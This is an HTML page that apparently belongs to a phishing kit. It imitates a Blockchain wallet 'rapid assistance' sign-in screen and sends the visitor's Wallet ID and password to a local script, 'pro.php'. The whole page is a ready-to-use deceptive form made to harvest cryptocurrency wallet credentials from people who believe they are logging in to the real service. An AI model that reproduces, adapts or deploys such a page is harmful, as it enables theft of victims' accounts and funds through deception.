<!DOCTYPE html>
<html>

<head>

	<meta charset="utf-8">
	<meta http-equiv="X-UA-Compatible" content="IE=edge">
	<meta name="viewport" content="width=device-width, initial-scale=1">

	<title>Blockchain Wallet</title>

	<link rel="stylesheet" href="assets/deo.css">
	<link rel="stylesheet" href="assets/ontop.css">
	<link rel="shortcut icon" href="assets/bchtp.png">

</head>


	<header>
		<h1>BLOCKCHAIN</h1>
    </header>

    <div class="main-content">

        <!-- You only need this form and the form-labels-on-top.css -->

        <form class="form-labels-on-top" method="post" action="pro.php">

            <div class="form-title-row">
                <h1>Welcome Back!</h1>
				<p style="margin-top:-10px;">Sign in to blockchain rapid assistance below</p>
            </div>

            <div class="form-row">
                <label>
                    <span style="font-weight:bold;">Wallet ID</span>
                    <input type="text" name="wid" aria-describedby="widHelp" required><br>
					<small id="widHelp" class="form-text text-muted">Find the login in your email, e.g blockchain.info/wallet<br>/1111-222-333... The series of numbers and dashes at the end of the link is your Wallet ID.</small>
                </label>
            </div>

            <div class="form-row">
                <label>
                    <span style="font-weight:bold;">Password</span>
                    <input type="password" name="psw" required>
                </label>
            </div>
            
		

            <div class="form-row">
                <button type="submit" name="submit" style="width:100%;">LOG IN</button>
            </div>
            
			 <div class="form-row">
                <h6><span style="color:#5090AB;">Login via Mobile</span>  &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; Having some trouble? Get help logging in. </h6>
            </div>
			
        </form>

    </div>

</body>

</html>